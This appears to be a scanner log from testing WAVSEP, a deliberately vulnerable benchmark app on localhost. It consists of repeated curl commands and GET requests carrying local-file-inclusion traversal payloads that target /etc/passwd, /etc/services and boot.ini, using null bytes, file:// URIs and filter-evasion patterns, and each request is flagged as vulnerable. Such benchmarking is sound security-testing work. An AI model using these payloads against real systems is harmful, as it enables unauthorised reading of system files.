curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
